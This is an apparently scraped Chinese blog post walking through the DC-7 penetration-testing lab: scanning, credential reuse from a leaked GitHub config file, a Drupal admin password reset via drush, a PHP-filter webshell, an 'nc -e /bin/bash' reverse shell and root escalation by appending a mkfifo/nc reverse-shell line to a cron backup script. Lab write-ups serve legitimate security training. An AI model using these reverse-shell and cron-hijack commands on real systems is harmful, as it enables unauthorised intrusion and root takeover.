当前位置: 首页 > news >正文

【安全靶场】-DC-7

❤️博客主页 iknow181
🔥系列专栏 网络安全、 Python、JavaSE、JavaWeb、CCNP
🎉欢迎大家点赞👍收藏⭐评论✍


在这里插入图片描述

一、收集信息

1.查看主机是否存活

nmap -T4 -sP 192.168.216.149

2.主动扫描

看开放了哪些端口和功能

nmap -A -p- 192.168.216.149

发现
22-ssh

80-http

3.whatweb扫描

发现有网站,进一步确认

4.搜索作者

发现下面有作者

去github上搜索一下,有没有相关内容

点击users,看

找到一个config.php文件,这是一个连接数据库的配置文件,里面有用户名和密码,可能和他的vps或者服务器的用户名密码匹配的

二、入侵目标主机

1.尝试进行ssh登录

2.查看文件

发现执行了/opt/scripts/backups.sh文件,生成了那些.gz的文件

3.进入文件夹

发现是一个备份数据库的sh文件,有可能是定时任务执行

4.利用drush

因为是drupal,所有有个drush命令

drush可以修改管理员用户

进入网站的根目录,修改管理员密码为123456(注意命令不要有空格)

5.进入网站后台

可以看到有个login

可以进入192.168.216.149/user/login,登录admin

进入content,编辑文章

最好能写入php代码

6.安装php插件

整一个drupal的php插件

加载安装包

安装成功

勾选php filter,并且激活

回到content发现有phpcode

7.生成木马文件写入

将其复制到content中

7.连接

8.nc连接

因为这个木马可能不太稳定

kali:nc -lvp 9988

目标:nc -e /bin/bash 192.168.216.161 9988

连接成功

9.美化界面

python -c 'import pty;pty.spawn("/bin/bash")'

三、提权

1.kali监听1234端口

2.将命令写入backups.sh

因为backups.sh是一个计划任务,用的root权限

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.216.161 1234 > /tmp/f" >> backups.sh"

3.等待计划任务执行

4.拿到flag

在这里插入图片描述

http://www.lryc.cn/news/429780.html

相关文章:

  • 0065__windows开发要看的经典书籍
  • 第133天:内网安全-横向移动域控提权NetLogonADCSPACKDC永恒之蓝
  • 【IoTDB 线上小课 06】列式写入=时序数据写入性能“利器”?
  • 【机器学习】小样本学习的实战技巧:如何在数据稀缺中取得突破
  • 2024.08.14 校招 实习 内推 面经
  • 国产双通道集成电机一体化应用的电机驱动芯片-SS6951A
  • 32 - II. 从上到下打印二叉树 II
  • 總結熱力學_3
  • TypeScript学习笔记1---认识ts与js的异同、ts的所有数据类型详解
  • 华为数通方向HCIP-DataCom H12-821题库(更新单选真题:1-10)
  • 【车载开发系列】单片机烧写的文件
  • pyqt 用lamada关联信号 传递参数 循环
  • adb命令
  • Spring Boot项目热部署
  • Chat App 项目之解析(八)
  • CAAC无人机飞行执照:学习内容与考试流程详解
  • 苹果手机怎么连接蓝牙耳机?3个方案,3秒连接
  • CAD图纸加密软件有哪些?10款超级好用的CAD图纸加密软件推荐
  • 【html+css 绚丽Loading】000011 三元轮回珠
  • 算法学习018 求最短路径 c++算法学习 中小学算法思维学习 比赛算法题解 信奥算法解析
  • vue-element-admin——<keep-alive>不符合预期缓存的原因
  • 基于ElementPlus的分页表格组件ReTable
  • 力扣题/图论/课程表
  • SQL进阶技巧:基于指定规则的缺失值填充问题
  • 【气象百科】光伏自动气象站的功能优势
  • 嵌入式AI快速入门课程-K510篇 (第二篇 Ubuntu的基础操作)
  • android13隐藏调节声音进度条下面的设置按钮
  • Java ArrayList和LinkedList
  • STM32F030行列式按键扫描
  • FPGA 综合笔记